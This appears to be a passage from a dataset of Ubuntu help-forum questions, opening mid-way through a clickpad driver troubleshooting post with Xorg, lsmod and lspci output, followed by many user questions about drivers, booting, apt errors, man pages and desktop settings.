ii ) synaptics : synps/2 synaptics touchpad : found clickpad property [ 21.808 ] ( -- ) synaptics : synps/2 synaptics touchpad : x-axis range 1472 - 5678 [ 21.808 ] ( -- ) synaptics : synps/2 synaptics touchpad : y-axis range 1408 - 4732 [ 21.808 ] ( -- ) synaptics : synps/2 synaptics touchpad : pressure range 0 - 255 [ 21.808 ] ( -- ) synaptics : synps/2 synaptics touchpad : finger width range 0 - 15 [ 21.808 ] ( -- ) synaptics : synps/2 synaptics touchpad : buttons : left double triple [ 21.808 ] ( -- ) synaptics : synps/2 synaptics touchpad : vendor 0x2 product 0x7 [ 21.808 ] ( ** ) option `` softbuttonareas '' `` 50 % 0 82 % 0 0 0 0 0 '' [ 21.808 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 21.808 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 21.808 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio1/input/input9/event9 '' [ 21.808 ] ( ii ) xinput : adding extended input device `` synps/2 synaptics touchpad '' ( type : touchpad , id 13 ) [ 21.808 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 21.808 ] ( ** ) synaptics : synps/2 synaptics touchpad : maxspeed is now 1.75 [ 21.808 ] ( ** ) synaptics : synps/2 synaptics touchpad : accelfactor is now 0.037 [ 21.808 ] ( ** ) synps/2 synaptics touchpad : ( accel ) keeping acceleration scheme 1 [ 21.808 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration profile 1 [ 21.808 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 21.808 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 21.808 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 21.809 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/mouse1 ) [ 21.809 ] ( ** ) synps/2 synaptics touchpad : ignoring device from inputclass `` touchpad ignore duplicates '' [ 21.810 ] ( ii ) config/udev : adding input device toshiba input device ( /dev/input/event6 ) found some info in archlinux regarding the driver being loaded twice with the second instance killing the driver . forgot the link . they were messing with xorg.conf checking with command lsmod module size used by parport_pc 32688 0 ppdev 17073 0 rfcomm 46619 0 bnep 18140 2 bluetooth 209199 10 rfcomm , bnep binfmt_misc 17500 1 nls_iso8859_1 12713 1 snd_hda_codec_hdmi 32007 1 snd_hda_codec_realtek 77876 1 joydev 17457 0 coretemp 13400 0 kvm_intel 132759 0 snd_hda_intel 33491 3 snd_hda_codec 134212 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec kvm 414070 1 kvm_intel ghash_clmulni_intel 13180 0 snd_pcm 96580 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec uvcvideo 76749 0 videobuf2_core 32851 1 uvcvideo videodev 120309 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12860 1 uvcvideo videobuf2_memops 13368 1 videobuf2_vmalloc aesni_intel 51037 0 cryptd 20403 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17208 1 aesni_intel snd_seq_midi 13324 0 snd_rawmidi 30512 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61521 2 snd_seq_midi , snd_seq_midi_event arc4 12529 2 snd_timer 29425 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq ath9k 131308 0 microcode 22803 0 psmouse 95552 0 i915 520519 3 mac80211 539908 1 ath9k serio_raw 13215 0 ath9k_common 14055 1 ath9k ath9k_hw 395218 2 ath9k , ath9k_common ath 23827 3 ath9k , ath9k_common , ath9k_hw drm_kms_helper 46784 1 i915 drm 275528 4 i915 , drm_kms_helper mei 40690 0 cfg80211 206566 3 ath9k , mac80211 , ath snd 78734 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device i2c_algo_bit 13413 1 i915 lpc_ich 17061 0 soundcore 15047 1 snd snd_page_alloc 18484 2 snd_hda_intel , snd_pcm toshiba_acpi 18726 0 sparse_keymap 13890 1 toshiba_acpi wmi 19070 1 toshiba_acpi mac_hid 13205 0 video 19335 1 i915 lp 17759 0 parport 46345 3 parport_pc , ppdev , lp hid_logitech 26585 0 ff_memless 13013 1 hid_logitech usbhid 46947 1 hid_logitech hid 100366 2 hid_logitech , usbhid r8169 61650 0 and for good measure lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) if i am interpreting this correctly , was n't the driver supposed to show up ? found http : //www.theorangenotebook.com/2012/02/call-for-testing-clickpad.html executing xinput xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=11 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ toshiba web camera - fhd id=9 [ slave keyboard ( 3 ) ] ↳ logitech usb receiver id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ toshiba input device id=14 [ slave keyboard ( 3 ) ] did not execute instructions as it is for 12.04 / am running 12.10 due to concerns issuing dist_upgrade which i think would roll me back to 12.04 tags for relevant info seem to be google “cft clickpad support ubuntu” main fix appears to be the kernel does not recognize the click pad . i am confused as it is reported properly and seemingly loads the driver per xorg.0.log yet if i am correct , the module is not loaded per lsmod command .
244751	i seem to be locked out of my account	i keep trying to log in on start up , typing my password and pressing enter . but it does n't go through . i just get kicked back to the login screen . i know i do n't have the password wrong . have i done something to lock myself out ? i was messing around with macchanger before this happened . just wlan0 . nothing else . used sudo a couple of times . did nothing as root .
244754	how to completely remove application from ubuntu 12.04	if i remove any application with sudo apt-get remove < applicationname > , the application is removed and then i can remove the repository later on . i have noticed that certain cached and config files remain in the system . some take up a large amount of space , e.g . google-chrome . it is hard to find and delete the remaining manually , as i am often not certain whether to delete them or not . is there any way to delete an application including the config and cache files along with the application ?
244758	moved ubuntu folder from c : to d : drive how to correct uuid entries	i had a previous ubuntu 11.10 installation which was done using wubi in d : drive of my computer . the corresponding grub.cfg entries are : http : //paste.ubuntu.com/1546414/ now i wanted to use ubuntu 12.04 so i deleted the previous installation from the d : drive and then installed ubuntu 12.04 . i accidentally installed it to the c : drive instead of installing it in the d : drive , and the grub entries here are http : //paste.ubuntu.com/1546422/ i did n't have enough space in the c : drive so i moved the ubuntu folder from c : drive to d : , but surprisingly it could not boot . realizing that grub.cfg needed to be updated i opened the old grub.cfg ( this 11.10 was installed in d : drive ) and checked the uuids grub.cfg which are ( for previous 11.10 install in d : drive ) search -- no-floppy -- fs-uuid -- set=root 8e9e86339e86143d linux /boot/vmlinuz-3.2.0-23-generic root=uuid=8e9e86339e86143d loop=/ubuntu/disks/root.disk ro in the new 12.04 grub.cfg ( which was accidentally installed in c : drive ) has following grub.cfg ( for 12.04 in c : drive ) search -- no-floppy -- fs-uuid -- set=root e4acaff5acafc082 linux /boot/vmlinuz-3.2.0-29-generic root=uuid=e4acaff5acafc082 loop=/ubuntu/disks/root.disk ro i have since moved the entire folder c : \ubuntu to d : drive so it is now d : \ubuntu what i notice is the old uuid entries ( from 11.10 ) are not the same as the uuid entries in 12.04 is there a way to fix this ?
244764	how can i stop a guest session created by startx command ?	i was trying to use ubuntu 12.4 with administrative privileges . so i typed the following commands in bash shell . sudo -v sudo su - startx -- :2 vt8 i do n't know what i have done . now , i can login as a guest only at boot up . when i try to login as a user , the login page refreshes and come back to the same page . when i log in as a guest , it wo n't allow me to access any of the user 's file . i get this message : you do n't have the authority to access this folder . > it 's not allowing to access any of the user 's file . how can i solve this problem ?
244769	is there a usb 3.0 docking station which works on quantal ( 12.10 ) ?	modern ultrabooks and hybrids pack sufficient power to serve as development workstations . still , 1920x1080 screen resolution fits much better to a 23 '' than 13 '' . there is a range of usb 3.0 devices with hdmi which make docking possible on windows . however , googling for 'usb 3.0 docking station ubuntu ' and variants produces no valid pointers . i can find questions like 'does x work with linux ' on windows-mostly hardware forums , but they are mostly left unanswered . please provide an answer from hand-on experience or a link to a usb 3.0 device use case .
244774	why does ubuntu need to update its kernel so often ?	what are the advantages for updating so often ?
244779	jenkins polling for ubuntu kernel upgrades ?	say i wanted to distribute a binary kernel module for a custom in-house piece of hardware to users inside my company . the ideal situation is that it requires no compilation on the part of the user . i just want to use the standard apt-get/software update gui tools to distribute it to our users . for our purposes here , we 'll assume that i have a jenkins instance set up to build said kernel module , package it into a .deb archive and add it to an in-house apt repo . this situation works , however i have to manually monitor when new kernels are released for the different versions of ubuntu and kick off each new kernel build manually . what i 'd like to find is a way for jenkins to automatically poll for kernel updates in the jenkins apt repo and kick off a new build of the driver for the new kernel . has anyone done anything similar before ? how did you go about doing it ?
244781	how to install apps to another drive ?	i have a ssd 80 gigs disk which i want to use for ubuntu 12.10 installation and some programs like libre office and firefox , but the new steam linux and games would fill up my ssd quickly . how can i install apps on second 2tb hdd ? i read few answers but i do n't exactly understand them .
244788	how do i install the manpage from node.js ' source tarball ?	i have downloaded node.js tarball from its website , and now i would like install the manpage that comes with it so that i can view it by typing : man nodejs how can i do this ?
244791	bat file to batch ?	hello i would like to know if its possible to turn this batch file into a working basfile for ubuntu , im completely new to all this . it works on a windows machine but it does not work on ubuntu . i found a converter on the internet but that dont work at all , so all help would be great dim shell dim port port = 4000 set shell=createobject ( `` wscript.shell '' ) for count = 0 to 5 shell.run `` cssserver.bat `` & port port = port + 100 next set shell=nothing
244794	video playback in chrome ruined by yellow snow	for a few days now my youtube and other video playback are ruined by yellow snow . but not when i use firefox . i can not seem to find the problem or a solution . please help .
244795	how to install photoshop cs6 ?	i 'd like to install photoshop cs6 on ubuntu 12.10 i 've tried searching software center but did n't find anything except gimp , but i want photoshop cs6 not anything else anyone can help ?
244799	usb2vga device not listed as output device	when i type xrandr the usb2vga device `` magic control technology corp. ( usb2vga dongle ) '' does not show up . a reboot with the device plugged in does n't change it . the kernel.log shows that it has been found ( http : //pastebin.com/qbj6sp0m ) . lsusb shows that it is still active ( with id 0711:5100 ) . i 'd like to use it under ubuntu 12.10 for an additional screen .
244800	ubuntu 12.10 starts up but i end up having a black screen in my laptop screen	so i recently did a fresh install of 12.10 in my acer aspire 4736z , which has intel gma4500 chipsets . i had to set 'nomodeset ' in the installation part to get through the installation itself , otherwise i would also get stuck with a black screen . it ran smoothly , no problems whatsoever after setting that mode . and then when i tried to boot ubuntu for the first time , the same thing happened right after boot . the screen would turn black with no backlight on whatsoever . but sounds could be heard no problem . searching on google for solutions , i was unable to fix it . however , i tried plugging an external monitor to the laptop , via vga , and it worked well . i could , and still can , see the os running perfectly through the monitor but not through the laptop screen . still , even if i unplug the monitor , the laptop screen will not display ubuntu . i would like to have my laptop screen display the os at once and any help is appreciated . thanks . ( :
244804	ubuntu 12.04 lts drains my samsung series 9 900x3c ultrabook 's battery extremely fast . is there anything i can do to fix that ?	the title basically says it all . my samsung series 9 900x3c ultrabook 's battery is in the deep red around barely three hours after disconnecting it from the power - and during most of that time the screen was n't even on . no heavy lifting , no video playback , nothing . just a browser with static sites was open .
244806	problems with nvidia gt640 on a desktop	i 'm currently running ubuntu 12.10 on a desktop with a nvidia gt 640 that is giving me alot of problems . everytime i boot , i get a mouse cursor over a blank black screen . booting using nomodeset gives me full resolution on only one of the monitors , but only over a reduced screen area ( it 's really weird ) . i 've narrowed it down to the fact that merely setting acpi=off in grub will enable this . the strangest part is that i can get it to work . if i totally reinstall the mesa package using sudo apt-get -- reinstall install libgl1-mesa-glx and use the default driver ( the open source one ) then i get a boot where both monitors are recognized at full resolution , no problem . however , once i restart , the same error happens . is there a way i can get these monitors to be recognized on the first try , no problem ? thanks . p.s . i 'm dual booting and everything works fine on windows , so i do n't think any of the hardware is faulty ( just poorly programmed : . i do n't really like windows , however , i prefer ubuntu .
244809	how do i manually install a man page ?	how do i install a man page file system-wide ? for example , if i have a man page file examplecommand.1 , how do i install it so that i can just type man examplecommand to view it ?
244814	xdebug to work with aptana	how do you get xdebug to work with aptana ? i 've successfully installed xdebug and added the necessary ini directives to the /etc/php5/conf.d/xdebug.ini file : zend_extension=/usr/lib/php5/20090626/xdebug.so xdebug.remote_enable=1 xdebug.remote_handler=dbgp xdebug.remote_mode=req xdebug.remote_host=127.0.0.1 xdebug.remote_port=9000 now i 'm not totally sure how to set it up in aptana . i 've googled and found you 're suppose to do something to this screen . but do n't know what each values do :
244818	how can i execute scripts as root without pointing to its location ?	i tend to use sudo arp-scan -- localnet -- interface wlan0 a lot , but i find it cumbersome to type this each time . to speed things up , i 've created a script , called arp-lw-scan , which should do this for me . contents of ~/scripts/arp-lw-scan : # ! /bin/bash arp-scan -- localnet -- interface wlan0 i 've added ~/scripts to my $ path in ~/.profile , so each script in that folder can get executed from any location by just typing its name in the terminal . however , i 'm having trouble executing arp-lw-scan in an easy way , because it requires root access . just typing arp-lw-scan while being in my home directory gives an error about not having root rights . i can type sudo ~/scripts/arp-lw-scan , and that works , but that 's still pretty much to type . i want to be able to just type sudo arp-lw-scan to execute the given script . how can i achieve this ?
244820	how to direct back in time snapshots to a samba share ?	running a samba share on a windows 7 pc . this pc , directs output to my unraid server . i can access the share from my laptop running ubuntu 12.04 via nautilus 3.4.2 . now i want to run back in time snapshots and direct them to the server via my windows share , but i ca n't locate the share in bit . anyone know how to do this ?
244822	errors running apt-get update and apt-get install mysql-server	since yesterday i 've been trying to run apt-get update unsuccessfully in ubuntu instances i am creating on the ec2 . in specific i 've been getting these errors : ign http : //security.ubuntu.com maverick-security/main amd64 packages ign http : //security.ubuntu.com maverick-security/universe amd64 packages ign http : //security.ubuntu.com maverick-security/multiverse amd64 packages err http : //security.ubuntu.com maverick-security/main sources 404 not found [ ip : 91.189.92.190 80 ] err http : //security.ubuntu.com maverick-security/universe sources 404 not found [ ip : 91.189.92.190 80 ] err http : //security.ubuntu.com maverick-security/main amd64 packages 404 not found [ ip : 91.189.92.190 80 ] err http : //security.ubuntu.com maverick-security/universe amd64 packages 404 not found [ ip : 91.189.92.190 80 ] err http : //security.ubuntu.com maverick-security/multiverse amd64 packages 404 not found [ ip : 91.189.92.190 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/main/source/sources.gz 404 not found [ ip : 91.189.92.190 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/universe/source/sources.gz 404 not found [ ip : 91.189.92.190 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/main/binary-amd64/packages.gz 404 not found [ ip : 91.189.92.190 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/universe/binary-amd64/packages.gz 404 not found [ ip : 91.189.92.190 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security/multiverse/binary-amd64/packages.gz 404 not found [ ip : 91.189.92.190 80 ] e : some index files failed to download , they have been ignored , or old ones used instead . root @ ip-10-168-230-63 : /etc/apt # also trying to install mysql-server , i 've been getting errors : root @ ip-10-168-230-63 : /etc/apt # apt-get install mysql-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libhtml-template-perl mysql-server-5.1 mysql-server-core-5.1 suggested packages : libipc-sharedcache-perl tinyca mailx the following new packages will be installed : libhtml-template-perl mysql-server mysql-server-5.1 mysql-server-core-5.1 0 upgraded , 4 newly installed , 0 to remove and 81 not upgraded . need to get 12.1mb/12.2mb of archives . after this operation , 29.5mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/ maverick-updates/main mysql-server-core-5.1 amd64 5.1.61-0ubuntu0.10.10.1 403 forbidden err http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/ maverick-updates/main mysql-server-5.1 amd64 5.1.61-0ubuntu0.10.10.1 403 forbidden err http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/ maverick-updates/main mysql-server all 5.1.61-0ubuntu0.10.10.1 403 forbidden failed to fetch http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server-core-5.1_5.1.61-0ubuntu0.10.10.1_amd64.deb 403 forbidden failed to fetch http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server-5.1_5.1.61-0ubuntu0.10.10.1_amd64.deb 403 forbidden failed to fetch http : //us-west-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server_5.1.61-0ubuntu0.10.10.1_all.deb 403 forbidden e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? root @ ip-10-168-230-63 : /etc/apt # i did run apt-get update -- fix-missing without any luck . any ideas ? i have done these tasks many times on ubuntu linux instances running in the aws ec2 without any problems . thanks in advance for your help !
244824	ubuntu 12.10 not working with samsung me40b/cy-tm40	i have installed ubuntu 12.10 and i 'm trying to get it to work with a samsung me40b with the cy-tm40 touch screen . the audio and visual output work fine with the hdmi connection . the cy-tm40 connects via usb , but ubuntu does not detect it . i 've verified the usb ports are working with other devices . i installed the tool calibrate touchscreen , but it only returns : error : no calibratable devices found . a samsung tech indicated standard hid drivers should work . does anyone have any suggestions for enhanced drivers , or tools that might help ? thanks in advance . ps . the screen does show up in /proc/bus/input/devices i : bus=0003 vendor=1870 product=010d version=0111 n : name= '' nexio touch device ( hs ) nexio hid multi-touch ati0400-06 '' p : phys=usb-0000:00:1a.0-1.3/input0 s : sysfs=/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.3/1-1.3:1.0/input/input14 u : uniq= h : handlers=event2 js0 b : prop=2 b : ev=b b : key=0 b : abs=2738000 3 and in xorg.0.log root @ efsd01 : /var/log # cat xorg.0.log | grep -i nexio | more [ 3.955 ] ( ii ) config/udev : adding input device nexio touch device ( hs ) nexio hid multi-touch ati0400-06 ( /dev/input/event2 ) [ 3.955 ] ( ii ) config/udev : adding input device nexio touch device ( hs ) nexio hid multi-touch ati0400-06 ( /dev/input/js0 ) [ 33.275 ] ( ii ) config/udev : adding input device nexio touch device ( hs ) nexio hid multi-touch ati0400-06 ( /dev/input/js0 ) [ 33.275 ] ( ii ) config/udev : adding input device nexio touch device ( hs ) nexio hid multi-touch ati0400-06 ( /dev/input/event2 ) [ 1528.357 ] ( ii ) config/udev : adding input device nexio touch device ( hs ) nexio hid multi-touch ati0400-06 ( /dev/input/js0 ) [ 1528.358 ] ( ii ) config/udev : adding input device nexio touch device ( hs ) nexio hid multi-touch ati0400-06 ( /dev/input/event2 ) but it does not show up in xinput list : root @ efsd01 : /var/log # xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ mosart semi . 2.4g keyboard mouse id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ mosart semi . 2.4g keyboard mouse id=9 [ slave keyboard ( 3 ) ] root @ efsd01 : /var/log #
244826	ctrl + shift + del key combination not working in chromium 's new tab page	the default key combination for clearing browsing data in chromium ( ctrl+â§shift+del ) is n't working when the new tab page is open and in focus : i press the keys and nothing happens . if i click the menu icon in chromium and choose the tools - > clear browsing data option , the dialog shows up . if i 'm not looking at the new tab page , the dialog shows up as expected if i press the same keys . i 'm using chromium in ubuntu 12.04 ( version 23.0.1271.97-0ubuntu0.12.04.1 ) . there are no extensions installed and i 'm not in incognito mode . i can use the same key combination on the same machine on firefox and it works . how can i fix this ? edit : it 's been pointed to me that this question is a bug request and should be closed . i have filed a bug report on the chromium project site .
244828	ubuntu 12.10 module wl not found	i was trying to install the b43 drivers , but i could n't because the module wl was not found . i am using ubuntu 12.10 . i know this is not much information so ask me to enter any commands in the terminal if needed .
244829	how can i restore the administration menu ?	i do not know how i did it but i am now missing my administration menu . i am using 12.04 ( but with all upgrades ) and gnome fall-back . could anyone direct me on how to restore it ? i have tried adding it in the edit menus gui but it is not there .
244830	toshiba l955d-107 no wireless connection detected	i have tried everything i have read about this . the problem is i ca n't find out what card it is . the only thing that comes up is realtek semiconductor corporation . there are no name on the card . no resctricted drivers shows up . i have tried the solutions here and from other sites . when i tried them , i get error 1 and 2 . i have managed to install the wired network , by using the suggestions found here . but every solution for wireless fails with the errors 1 and 2 . can anyone please help me ? here is the output of sudo lshw -c net : *-network unclaimed description : ethernet controller product : ar8162 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:01:00.0 version : 10 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list configuration : latency=0 resources : memory : f0100000-f013ffff ioport:3000 ( size=128 ) *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:2000 ( size=256 ) memory : f0000000-f0003fff and here is the reason for the error 2 , i have to search to find out which one gave me error 1 : make -c /lib/modules/3.5.0-22-generic/build m=/home/kenneth/nedlastinger/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-22-generic' cc [ m ] /home/kenneth/nedlastinger/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o /home/kenneth/nedlastinger/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘_rtl_init_mac80211’ : /home/kenneth/nedlastinger/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : error : ‘ieee80211_hw_beacon_filter’ undeclared ( first use in this function ) /home/kenneth/nedlastinger/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : note : each undeclared identifier is reported only once for each function it appears in make [ 2 ] : *** [ /home/kenneth/nedlastinger/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/kenneth/nedlastinger/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-22-generic' make : *** [ all ] error 2 i have found out that the wireless card is called rtl8723ae . when i looked at the homepage for toshiba , then i found that this laptop is delivered with ubuntu or windows 8 . so it is a mystery that it wont work . the one with ubuntu was not available in my country . i see from other posts that it should work in 12.04 . do i have to downgrade from 12.10 to 12.04 ? this is where i found that information : drivers for realtek wireless module for toshiba c850-a965 ?
244833	12.10 tuxonice hibernation problem - task refuses to freeze	ubuntu quantal refuses to hibernate with tuxonice with following message : [ 1872.211096 ] freezing of tasks failed after 20.00 seconds ( 1 tasks refusing to freeze , wq_busy=0 ) : [ 1872.211099 ] flush-8:0 r running 0 298 2 0x00000000 i 'm wondering what is `` flush '' process ? and what it is doing ? and how this issue can be resolved ? setting alwaysforce yes alwayskill yes in /etc/hibernate/common.conf has no effect . thanks !
244834	gedit3 plugins for ipython , htmltidy , zencoding ?	i 'm still not happy with any of my html and python editing options on ubuntu . it looks like there are a few different python and ipython plugins for gedit but most seem to be for gedit2 . same with zen coding and html tidy . are there good html and python plugins for gedit3 that folks like ?
244836	open file from terminal in specific application	i use xdg-open a lot in the terminal ; this opens a file in the default application . however , sometimes i 'd like to open a file in a different ( non-default ) application . is there a way to achieve this from the terminal ? ( obviously , some applications can take a file as an argument , e.g . vlc /path/to/movie.mp3 , but i 'm looking for a more generic way that works in all situations , similar to xdg-open . ) an advantage of an xdg-open-like command is that the terminal window can be closed after opening the file/application . however , if i use ( e.g . ) vlc /path/to/movie.mp3 & , then i 'll need to keep the terminal window open .
244838	unknown user 119 when i type ps	when i typed ps -aux i recived ( ... ) root 2158 0.3 0.1 43860 6028 ? sl jan18 0:36 passenger spawn server 119 2037 0.0 0.6 59152 26208 ? s jan18 0:08 /usr/sbin/tor ( ... ) my question is what is this magic tor in my sbin and what is 119 user ? i have only one proces from it and it name is tor..
244842	find command does not find string in subfolders	i have a file structure something like this : /apps/base/logs1 and /apps/base/logs2 both logs1 and logs2 folders have .log files with some other files as well . i am trying to do this from /apps folder i want to be able to find all files ( folders and sub-folders ) that have the string `` error '' . this command find . -name `` *.log '' -exec grep -h `` error '' ' { } ' \ ; -print works fine and shows me all .log files directly in the folder when i am in the folder /apps/base/logs1 or /apps/base/logs2 . but when i switch to the folder /apps , this command does not yield any results . is there anything that i am missing or need to change ? i have tried several other options but i can not get it to work . any help will be appreciated . thanks
244844	i installed ubuntu and i can no longer boot win 7 or ubuntu . can someone help me ?	i installed ubuntu and i can no longer boot win 7 or ubuntu . can someone help me ? i tried 3 iso boot boot fixes and none worked on windows 7 or ubuntu 12.10. boot-repair retatux windows repair disk windows repair does not see the os . i can see the files on /dev/sdc1 and ubuntu on sda1 . what a mess .
244849	can not login to ubuntu 12.04 after upgrade with weird keyboard layout	well i just upgraded ubuntu 11.10 to ubuntu 12.04 lts and surprisingly enough i can not login because the password is not correct . i realized that the reason is that the keyboard layout is farsi and therefore it does not accept it . farsi layout was my third choice of layout in ubuntu 11.10 but now it is the only choice . what are the options to bypass this issue ?
244852	ubuntu all screwy after dist-upgrade . how do i revert the damage ?	after last night 's kernel upgrade i 'm getting the following symptoms : after restarting computer several times . one of my screens ( always the same one ) is split down the middle . not always in the same place , and sometimes shows `` trails '' . unity desktop half-loads and then does n't respond to any command . the mouse moves but nothing is clickable . xmonad desktop responds ( i 'm on xmonad desktop right now , using the second screen ) . curiously : during one of my boots , ubuntu brought up the grub menu . i chose `` ubuntu '' option and suddenly everything worked fine . i restarted the computer again , and everything is screwy again . i 've tried to bring up the grub menu again , but pressing shift during boot process makes my computer shut off instantly and restart . how do i revert the damage caused by the dist-upgrade ?
244853	brightness controls do n't work on macbook - stuck on high ( nvidia geforce 9400m )	i am using a macbook ( aluminum late 2008 version ) and dual booting ubuntu 12.10 after installation the keyboard controls for volume and brightness worked perfectly , but a few days later the brightness got stuck on high and it 's been giving me headaches and is super annoying . i ca n't use the keyboard controls for brightness or change it in the settings . i 've tried searching for a fix but nothing has worked so far . any suggestions ? also i have played around with the graphics drivers and i 'm currently using : nvidia binary xorg driver . should i change this ? ( go easy on me , i 'm a newbie : ) ) graphics : nvidia geforce 9400m/integrated/sse2 os type : 32-bit i 'll provide any extra information needed
244863	make `` focus follows mouse '' application specific	i wondered if this functionality was built in or if it is even scriptable . in gimp 's new single window mode , it still treats the main canvas and the layers dock as 2 separate windows that steal focus from each other . this is n't a problem in multi window mode even though my window manager is set to `` click to focus '' i wondered if this could be automated to use `` focus follows mouse '' , but only for gimp windows . xubuntu 12.04-lts ( no unity ) gimp 2.8.2
244864	installing league of legends error	i have been trying to install league of legends using this guide http : //na.leagueoflegends.com/board/ ... .php ? t=2107392 i have gotten to step iii b . ( play lol ) and am getting the following error after running the sh file . the program rads_user_kernel.exe has encountered a serious problem and needs to close . we are sorry for the invoncenience ( the details are in this pastebin ) . i have checked to make sure i have done all of the steps properly , and have googled as much as i can to try to find the answer , and have had no luck . any idea what is causing this ?
